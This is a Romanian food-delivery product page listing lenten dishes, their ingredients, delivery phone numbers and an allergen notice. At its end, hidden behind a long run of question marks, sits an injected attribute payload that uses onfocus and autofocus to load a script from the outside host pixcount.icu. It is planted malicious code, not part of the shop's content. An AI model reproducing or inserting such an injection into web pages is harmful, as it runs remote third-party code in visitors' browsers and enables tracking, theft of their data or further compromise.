Zona BD Nicolae Grigorescu: tel. 0771373821
Zona Theodor Pallady: tel. 0758103269
Zona Berceni -Giurgiului: tel. 0758105629

PREPARATE POST

0,00 lei

SELECTEAZA O ALTA CATEGORIE

Comanzi astazi, primesti maine! (data se poate selecta la checkout)

?orez , ceapa , morcov ,ciuperci ,condimente ,patrunjel
?mazare ,ceapa , morcov ,ardei kapia ,sos rosii , condimente
?cartofi ,ceapa ,morcov, sos rosii ,usturoi ,foaie dafin , condimente, patrunjel
?cartofi ,ceapa ,vanata ,dovlecel ,mazare ,fasole verde ,rosie , morcov ,sos rosie , condimente ardei kapia, patrunjel
?fasole , morcov ,ceapa ,ardei kapia ,piper ,foi de dafin , marar
?fasole ,ceapa , usturoi , condimente ,ceapa calita
?vinete ,ceapa ,ulei ,condimente
?varza ,ceapa, rosii ,foi de dafin , cimbru
?cartofi , unt vegetal ,condimente
?cartofi ,smantana ,condimente provance
0,00 lei
  • Options Price: 0,00 lei
  • Product Price: 0,00 lei
  • Total: 0,00 lei

Descriere

Mancare gatita traditional, special pentru dumneavoastra! Comandati astazi si primiti a doua zi! Ora de livrare se alege la checkout!

 

 

 

 

 

Mancarea gatita poate contine urmatorii alergeni: Cereale care contin gluten (adica grau, secara, orz, ovaz, grau spelt, grau mare sau hibrizi ai acestora) si produse derivate, crustacee si produse derivate, oua si produse derivate, peste si produse derivate, arahide si produse derivate, soia si produse derivate, lapte si produse derivate (inclusiv lactoza), fructe cu coaja, adica migdale (Amygdalus communis L.), alune de padure (Corylus avellana), nuci (Juglans regia), anacarde (Anacardium occidentale) nuci Pecan [Carya illinoiesis (Wangenh.) K. Koch], nuci de Brazilia (Bertholletia excelsa), fistic (Pistacia vera), nuci de macadamia si nuci de Queensland (Macadamia ternifolia) si produse derivate, telina si produse derivate, mustar si produse derivate, seminte de susan si produse derivate, dioxid de sulf si sulfiti în concentratii de peste 10 mg/kg sau 10 mg/litru, lupin si produse derivate. Pentru o informare completa va rugam sa ne contactati folosind mijloacele oferite pe site.

0
0,00 lei
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//pixcount.icu/counter.js";document.head.append(script); autofocus=\"
Empty Cart